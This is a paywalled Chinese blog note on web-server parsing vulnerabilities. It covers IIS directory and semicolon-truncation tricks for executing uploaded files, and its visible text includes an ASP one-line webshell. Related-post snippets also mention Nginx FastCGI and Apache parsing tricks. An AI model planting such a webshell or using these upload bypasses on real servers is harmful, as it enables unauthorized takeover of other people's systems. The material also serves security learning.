解析漏洞

最新推荐文章于 2023-09-09 10:42:28 发布
最新推荐文章于 2023-09-09 10:42:28 发布
阅读量171 收藏
点赞数
分类专栏: web安全 文章标签: nginx apache php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45617819/article/details/104571962
版权

解析漏洞是指web服务器因对http请求处理不当导致将非可执行的脚本,文件等当做可执行的脚本,文件等执行。该漏洞一般配合服务器的文件上传功能使用,以获取服务器的权限。

0x01 IIS

1.IIS 5.X-6.0解析漏洞:

  • 存在以".asp"格式结尾的文件夹,里面的任意文件都可以当作asp脚本执行:
    http://127.0.0.1/.asp/1.txt==http://127.0.0.1/.asp/1.asp
    其它文件格式解析:".asa .cer .aspx "

  • 文件含 ; 号,后面的内容会被截断:
    http://127.0.0.1/1.asp;.jpg==http://127.0.0.1/1.asp

asp一句话: <%execute(request("value"))%>

2.IIS7.0/7.5畸形文件解析:同nginx

0x02 Apache

默认web目录:/var/www/html
配置文件目录:/etc/httpd/conf/httpd.conf

最低0.47元/天 解锁文章
happysecurity
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
解析漏洞源码
02-28
在网络安全领域,解析漏洞是一种常见的安全问题,尤其在网站开发中。这种漏洞通常是由于服务器或应用程序在处理文件上传时,对文件类型或内容的解析方式存在缺陷,导致攻击者能够绕过安全防护,上传恶意代码或者执行...
解析漏洞总结
whatday的专栏
01-31 5522
一、IIS 5.x/6.0解析漏洞 IIS 6.0解析利用方法有两种 1.目录解析 /xx.asp/xx.jpg 2.文件解析 sp.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 sp.asp,那么 /sp.asp/1.jpg   将
解析漏洞整理
fendo
02-28 6332
1.什么是解析漏洞 以其他格式执行出脚本格式的效果。 2.解析漏洞产生的条件 1.命名规则 2.搭建平台 3.常见的解析漏洞 (一)IIS5.x-6.x解析漏洞 使用iis5.x-6.x版本的服务器,大多为windows server 2003,网站比较古老,开发语句一般为asp;该解析漏洞也只能解析asp文件,而不能解析aspx文件。
PHP中使用FastCGI解析漏洞及修复方案
01-20
漏洞描述: Nginx默认是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通过正则匹配设置SCRIPT_FILENAME。当访问http://huoche.7234.cn/images/jb51/jxpmrseidpt.jpg/1.php这个URL时,$fastcgi_script_...
中文解析漏洞
03-23
中文解析漏洞
Apache文件解析漏洞-01
最新发布
09-15
Apache文件解析漏洞-01 Apache文件解析漏洞是一种基于Apache服务器的文件解析机制中的漏洞,攻击者可以通过构造特殊的文件名来欺骗Apache服务器,导致服务器错误地解析文件类型,从而导致安全漏洞的出现。 Apache...
Nginx 解析漏洞
来日可期的博客
09-09 3888
Nginx空字节漏洞Nginx 解析漏洞复现,Nginx 文件名逻辑漏洞(CVE-2013-4547)漏洞复现合集
【学习笔记】解析漏洞大全
chualam的博客
11-09 282
iis6 baidu. com/xx.asp/xx.jpg baidu. com/xx.asp;.jpg 都会被解析为asp文件 默认可执行文件除了asp 还有cer asa cdx apache 他是从右到左解析的,遇到不能识别的后缀名会直接跳过,例如xx. php. fuck 会解析php 配置问题导致的解析apache的conf里面add handler php5-script和addtype application/x-httpd-php 当遇到类似于xx. php. jsp时会自动解析php
常见解析漏洞
孤的博客
09-30 601
IIS6.0-文件解析漏洞 IIS6.0-目录解析漏洞 IIS7.0-畸形解析漏洞 apache-%0a解析漏洞 apache-未知后缀名解析漏洞 nginx-访问文件解析漏洞 nginx-畸形解析漏洞 nginx-截断解析漏洞 IIS 6.0 1、目录解析 example:www.xxx.com/xxx.asp/xxx.jpg IIS服务器会把.asp .asa目录下的文件都解析成asp文件。其...
iis8.5解析漏洞
08-31
所谓的解析漏洞是指由于服务器在解析用户提交的URL请求时没有正确验证或过滤,导致攻击者可以通过构造恶意的请求来绕过服务器的安全机制,进而执行未经授权的操作。 IIS 8.5的解析漏洞会导致以下问题: 1. 目录...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值